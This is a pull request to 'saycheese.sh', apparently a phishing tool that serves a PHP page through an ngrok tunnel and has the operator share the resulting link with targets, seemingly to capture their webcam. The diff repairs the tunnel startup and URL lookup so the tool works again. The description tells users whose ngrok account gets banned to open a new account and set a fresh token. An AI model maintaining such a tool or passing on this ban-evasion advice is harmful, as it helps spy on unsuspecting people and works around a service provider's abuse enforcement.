### PR TITLE
Ngrok http 3333 Error Fixed 

### DIFF
--- a/saycheese.sh
+++ b/saycheese.sh
@@ -153,16 +153,20 @@ printf "\e[1;92m[\e[0m+\e[1;92m] Starting php server(Turn On Hotspot if on termu
 php -S 0.0.0.0:3333 > /dev/null 2>&1 &
 sleep 2
 printf "\e[1;92m[\e[0m\e[1;77m+\e[1;92m] Starting ngrok server(Hotspot must be started) \e[0m\e[1;77m(http 3333)\e[0m\e[1;92m...\n"
-./ngrok http 3333 > /dev/null 2>&1 &
-sleep 10
+/usr/local/bin/ngrok http 3333 > /dev/null 2>&1 &sleep 10  #Modified PATH
+#Function modiefied to get correctly the ngrok url
+get_ngrok_url2() {
+    local tunnel_info=$(curl -s -N http://127.0.0.1:4040/api/tunnels)
+    local url=$(echo "$tunnel_info" | jq -r '.tunnels[0].public_url')
+    echo "$url"
+}
 
-link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
-
-if [[ -z $link ]];then
+link2=$(get_ngrok_url2) 
+if [[ -z $link2 ]];then
 printf "\e[1;91m[!] Ngrok error, debug:\e[0m\e[1;77m ./ngrok http 3333\e[0m\n"
 exit 1
 fi
-printf "\e[1;92m[\e[0m+\e[1;92m] Share \e[0m\e[1;77mHTTPS\e[0m\e[1;92m link:\e[0m\e[1;77m %s\e[0m\n" $link
+printf "\e[1;92m[\e[0m+\e[1;92m] Share \e[0m\e[1;77mHTTPS\e[0m\e[1;92m link:\e[0m\e[1;77m %s\e[0m\n" $link2
 
 }
 

--- a/saycheese.sh
+++ b/saycheese.sh
@@ -153,7 +153,8 @@ printf "\e[1;92m[\e[0m+\e[1;92m] Starting php server(Turn On Hotspot if on termu
 php -S 0.0.0.0:3333 > /dev/null 2>&1 &
 sleep 2
 printf "\e[1;92m[\e[0m\e[1;77m+\e[1;92m] Starting ngrok server(Hotspot must be started) \e[0m\e[1;77m(http 3333)\e[0m\e[1;92m...\n"
-/usr/local/bin/ngrok http 3333 > /dev/null 2>&1 &sleep 10  #Modified PATH
+/usr/local/bin/ngrok http 3333 > /dev/null 2>&1 &
+sleep 10  #Modified PATH
 #Function modiefied to get correctly the ngrok url
 get_ngrok_url2() {
     local tunnel_info=$(curl -s -N http://127.0.0.1:4040/api/tunnels)


### PR DESCRIPTION
You might experience some troubles if you select the Ngrok server option. This might be because Ngrok updated their services, and the new domains end with "ngrok-free.app", affecting the way the API is consulted. Another error that might appear is the PATH of Ngrok (This has also been fixed).
Another error you might experiment is that Ngrok ban your account, if this happens you should open a new account and set the token.
If nothing works, search for similar tools;). 
